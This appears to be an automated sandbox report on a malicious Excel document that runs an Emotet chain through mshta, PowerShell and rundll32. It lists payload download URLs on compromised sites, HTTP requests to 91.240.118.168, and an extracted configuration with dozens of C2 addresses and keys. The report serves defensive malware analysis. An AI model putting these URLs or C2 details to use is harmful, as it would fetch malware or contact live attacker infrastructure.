                            Source: http://sneakadream.com/wp-content/pccmAOq/Avira URL Cloud: Label: malware
                            Source: https://www.yeald.financeAvira URL Cloud: Label: malware
                            Source: https://www.yeald.finance/wp-admin/1WgPRm/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlBAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://tattooblog.cn/wp-includesAvira URL Cloud: Label: malware
                            Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/Avira URL Cloud: Label: malware
                            Source: https://www.yeald.finance/wp-admin/1WgPRm/Avira URL Cloud: Label: malware
                            Source: https://allaagency.ro/wp-admin/7Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlWinSta0Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlC:Avira URL Cloud: Label: malware
                            Source: https://chochungcuhanoi.com/wp-cAvira URL Cloud: Label: malware
                            Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3Avira URL Cloud: Label: malware
                            Source: https://palankhir.hu/tools/GJRNhZHz/PE3Avira URL Cloud: Label: malware
                            Source: http://masboni.com/wp-admin/3zUQl/Avira URL Cloud: Label: malware
                            Source: https://falah.org.pk/vegasvulkanAvira URL Cloud: Label: phishing
                            Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/feAvira URL Cloud: Label: malware
                            Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/Avira URL Cloud: Label: malware
                            Source: https://weddingbandsirelandjbk.com/hgsynt2/o/PE3Avira URL Cloud: Label: malware
                            Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlmshtaAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlsEAvira URL Cloud: Label: malware
                            Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3Avira URL Cloud: Label: malware
                            Source: http://sneakadream.com/wp-content/pccmAOq/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.pngPE3Avira URL Cloud: Label: malware
                            Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/Avira URL Cloud: Label: malware
                            Source: http://starspeedng.com/One-File/U3Trml/PE3Avira URL Cloud: Label: phishing
                            Source: https://getcode.info/wp-content/QDx8b5j/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168URL Reputation: Label: malware
                            Source: https://allaagency.ro/wp-admin/7/PE3Avira URL Cloud: Label: malware
                            Source: https://getcode.info/wp-content/QDx8b5j/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlv1.0YAAvira URL Cloud: Label: malware
                            Source: http://masboni.com/wp-admin/3zUQAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.pngAvira URL Cloud: Label: malware
                            Source: https://allaagency.ro/wp-admin/7/Avira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 15.2.rundll32.exe.300000.2.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: imedpub.com_10.xlsReversingLabs: Detection: 30%
                            Multi AV Scanner detection for domain / URL
                            Source: www.yeald.financeVirustotal: Detection: 8%Perma Link
                            Source: https://palankhir.hu/tools/GJRNhZHz/Virustotal: Detection: 11%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\Users\Public\Documents\ssd.dllJoe Sandbox ML: detected
                            Source: unknownHTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: ;.PDB source: powershell.exe, 00000006.00000002.672109254.000000000027A000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002D7E00 FindFirstFileW,15_2_002D7E00

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
                            Source: global trafficDNS query: name: www.yeald.finance
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 94.130.116.76:443

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                            Source: global trafficHTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1Host: www.yeald.financeConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: unknownHTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
                            Source: global trafficHTTP traffic detected: GET /zzx/ccv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewIP Address: 94.130.116.76 94.130.116.76
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168
                            Source: powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe
                            Source: mshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433323988.00000000003F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433420430.0000000000496000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418463875.000000000319E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417270436.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.html
                            Source: mshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.html6
                            Source: imedpub.com_10.xls.0.drString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.433356985.0000000000419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlC:
                            Source: mshta.exe, 00000004.00000002.433261610.0000000000360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.419183673.0000000002A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.419030609.0000000002A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.html
                            Source: mshta.exe, 00000004.00000002.433261610.0000000000360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.433420430.0000000000496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlo
                            Source: mshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlsE
                            Source: mshta.exe, 00000004.00000003.417104414.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433793500.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432391845.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417832916.0000000003198000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418463875.000000000319E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417270436.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlv1.0YA
                            Source: powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.png
                            Source: powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/zzx/ccv/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677710900.000000001B449000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: powershell.exe, 00000006.00000002.677753484.000000001B48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 0000000F.00000002.672219748.00000000003DB000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://masboni.c
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://masboni.com/wp-admin/3zUQ
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://masboni.com/wp-admin/3zUQl/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://masboni.com/wp-admin/3zUQl/PE3
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: powershell.exe, 00000006.00000002.677710900.000000001B449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: powershell.exe, 00000006.00000002.677710900.000000001B449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sneakadream.com/wp-conten
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sneakadream.com/wp-content/pccmAOq/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sneakadream.com/wp-content/pccmAOq/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://starspeedng.com/One-File/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://starspeedng.com/One-File/U3Trml/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://starspeedng.com/One-File/U3Trml/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tattooblog.cn/wp-includes
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tattooblog.cn/wp-includes/KJLv/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tattooblog.cn/wp-includes/KJLv/PE3
                            Source: powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000006.00000002.672090023.000000000025C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: mshta.exe, 00000004.00000002.433399492.000000000044B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417104414.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417168851.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418402237.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432916821.0000000003180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433813182.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432328982.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432944579.000000000313F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417763743.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432086271.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433727855.000000000313F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000002.433840296.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433713117.000000000312B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418141010.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417223440.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432232024.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432985416.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418629434.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: mshta.exe, 00000004.00000003.417168851.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433813182.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432328982.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432086271.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/A
                            Source: rundll32.exe, 0000000F.00000002.672219748.00000000003DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 0000000F.00000002.672163604.000000000039A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/Tep
                            Source: rundll32.exe, 0000000F.00000002.672219748.00000000003DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/Tepia
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allaagency.ro/wp-admin/7
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allaagency.ro/wp-admin/7/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allaagency.ro/wp-admin/7/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chochungcuhanoi.com/wp-c
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://falah.or
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://falah.org.pk/vegasvulkan
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getcode.info/wp-content/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getcode.info/wp-content/QDx8b5j/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getcode.info/wp-content/QDx8b5j/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://palankhir.hu/tools/GJRNh
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://palankhir.hu/tools/GJRNhZHz/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://palankhir.hu/tools/GJRNhZHz/PE3
                            Source: powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677710900.000000001B449000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tanquessepticos.com/wp-a
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3
